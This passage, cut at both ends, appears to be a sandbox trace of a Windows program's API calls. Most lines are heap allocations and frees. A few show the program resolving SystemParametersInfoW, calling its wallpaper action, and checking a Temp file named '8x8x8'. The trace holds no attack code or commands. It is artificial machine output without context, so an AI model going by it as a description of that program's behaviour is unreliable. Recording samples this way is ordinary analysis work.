Size=0x8) returned 0x2e54b58 [0280.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0280.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0280.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0280.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0280.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0280.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0280.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0280.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0280.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0280.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0280.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0280.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0280.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0280.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54788 | out: hHeap=0x970000) returned 1 [0280.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0280.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0280.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0280.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0280.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0280.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0280.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0280.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0280.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0280.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0280.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0280.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0280.638] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0280.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0280.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0280.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0280.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0280.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0280.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0280.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0280.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0280.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0280.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0280.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0280.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0280.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0280.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0280.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0280.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0280.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0280.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0280.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0280.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0280.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0280.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0280.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0280.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0280.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0280.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0280.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0280.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0280.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0280.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0280.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0280.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0280.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0280.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0280.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0280.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0280.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0280.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0280.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0280.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0280.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0280.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0280.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0280.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0280.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0280.639] LoadLibraryW (lpLibFileName="user32.dll") returned 0x750c0000 [0280.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0280.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0280.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0280.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x16) returned 0x2e69ac8 [0280.640] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2e69ac8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0280.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0280.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0280.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0280.640] GetProcAddress (hModule=0x750c0000, lpProcName="SystemParametersInfoW") returned 0x750ef210 [0280.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54580 | out: hHeap=0x970000) returned 1 [0280.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0280.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0280.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0280.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0280.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0280.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0280.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0280.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0280.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0280.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0280.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0280.640] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0280.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14488 [0280.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0280.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0280.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0280.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0280.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0280.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0280.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0280.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0280.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0280.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0280.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0280.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0280.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0280.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0280.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0280.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0280.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0280.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0280.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0280.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0280.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0280.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0280.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0280.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0280.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0280.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0280.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0280.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0280.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0280.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0280.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0280.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0280.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0280.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0280.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0280.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0280.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0280.712] FreeLibrary (hLibModule=0x750c0000) returned 1 [0280.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0280.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0280.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0280.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0280.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0280.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0280.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0280.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0280.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0280.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0280.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0280.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0280.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0280.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0280.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0280.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0280.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0280.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0280.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0280.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0280.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0280.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0280.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0280.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0280.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0280.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0280.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0280.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0280.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0280.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0280.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f155c8 [0280.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0280.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0280.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14488 | out: hHeap=0x970000) returned 1 [0280.713] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0280.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0280.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0280.713] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0280.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0280.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0280.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0280.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0280.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0280.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0280.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0280.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0280.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0280.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0280.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0280.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0280.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0280.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0280.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0280.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0280.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54670 | out: hHeap=0x970000) returned 1 [0280.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0280.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0280.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0280.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0280.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0280.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0280.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0280.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0280.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0280.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0280.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0280.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f155c8 | out: hHeap=0x970000) returned 1 [0280.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0280.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0280.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0280.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545f8 | out: hHeap=0x970000) returned 1 [0280.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0280.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0280.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0280.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0280.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0280.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0280.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0280.715] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0280.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0280.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0280.715] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0280.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0280.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0280.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0280.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0280.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0280.715] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf3c0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0280.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0280.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0280.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0280.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0280.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0280.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0280.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0280.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0280.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0280.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0280.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0280.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0280.716] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0280.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0280.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0280.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0280.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 